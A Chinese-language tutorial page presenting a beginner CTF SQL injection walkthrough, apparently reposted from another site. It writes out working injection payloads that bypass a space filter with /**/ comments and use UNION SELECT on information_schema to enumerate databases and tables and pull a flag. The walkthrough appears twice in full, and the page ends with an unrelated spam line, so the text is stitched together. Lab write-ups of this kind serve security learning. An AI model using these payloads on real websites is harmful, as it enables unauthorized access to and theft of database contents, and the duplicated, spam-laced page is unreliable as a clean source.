<form id="hz9zz"></form>
  • <form id="hz9zz"></form>

      <nobr id="hz9zz"></nobr>

      <form id="hz9zz"></form>

    1. 明輝手游網中心:是一個免費提供流行視頻軟件教程、在線學習分享的學習平臺!

      sql注入的相關容易案例

      [摘要]所謂SQL注入,就是通過把SQL命令插入到Web表單提交或輸入域名或頁面請求的查詢字符串,最終達到欺騙服務器執行惡意的SQL命令。接下來給大家分享一個簡單的sql注入,一起看看吧所謂SQL注入,就是...
      所謂SQL注入,就是通過把SQL命令插入到Web表單提交或輸入域名或頁面請求的查詢字符串,最終達到欺騙服務器執行惡意的SQL命令。接下來給大家分享一個簡單的sql注入,一起看看吧

      所謂SQL注入,就是通過把SQL命令插入到Web表單提交或輸入域名或頁面請求的查詢字符串,最終達到欺騙服務器執行惡意的SQL命令。具體來說,它是利用現有應用程序,將(惡意)的SQL命令注入到后臺數據庫引擎執行的能力,它可以通過在Web表單中輸入(惡意)SQL語句得到一個存在安全漏洞的網站上的數據庫,而不是按照設計者意圖去執行SQL語句。比如先前的很多影視網站泄露VIP會員密碼大多就是通過WEB表單遞交查詢字符暴出的,這類表單特別容易受到sql注入攻擊。

      分別輸入1,2,3有對應的結果

      sql注入的相關簡單實例

      使用'會報錯,于是

      構造常用的sql語句:1' and '1'='1

      sql注入的相關簡單實例

      沒有反應試一試1' and '1'='2

      sql注入的相關簡單實例

      還是沒反應,工具提示,應該是過濾了什么,改一下sql語句試一試

      1and1=1

      sql注入的相關簡單實例

      可以顯示東西,經過判斷過濾了空格,我們使用/**/來代替空格

      試一試1'/**/and/**/'1'='1

      發現有結果了:

      于是構建sql語句:

      判斷有那些數據庫:


      1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1

      可以看到結果:

      sql注入的相關簡單實例

      查看有哪些數據表:


      1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1

      sql注入的相關簡單實例

      發現了flag的表,我們猜測應該是在web1數據庫中并且字段就是flag(其實就在本頁面的數據庫中)

      故:


      1'/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/'1'='1

      sql注入的相關簡單實例

      本人也是初學者,參考了許多大佬的wp 自己寫出來后有什么錯誤的地方,希望大家指出,謝謝!

      根據頁面提示,到底過濾了什么東西?可以知道一定過濾了什么....

      分別輸入1,2,3有對應的結果

      sql注入的相關簡單實例

      使用'會報錯,于是

      構造常用的sql語句:1' and '1'='1

      sql注入的相關簡單實例

      沒有反應試一試1' and '1'='2

      sql注入的相關簡單實例

      還是沒反應,工具提示,應該是過濾了什么,改一下sql語句試一試

      1and1=1

      sql注入的相關簡單實例

      可以顯示東西,經過判斷過濾了空格,我們使用/**/來代替空格

      試一試1'/**/and/**/'1'='1

      發現有結果了:

      于是構建sql語句:

      判斷有那些數據庫:


      1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1

      可以看到結果:

      sql注入的相關簡單實例

      查看有哪些數據表:


      1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1

      sql注入的相關簡單實例

      發現了flag的表,我們猜測應該是在web1數據庫中并且字段就是flag(其實就在本頁面的數據庫中)

      故:


      1'/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/'1'='1

      sql注入的相關簡單實例

      以上就是sql注入的相關簡單實例的詳細內容,更多請關注php中文網其它相關文章!


      學習教程快速掌握從入門到精通的SQL知識。




      日韩精品一区二区三区高清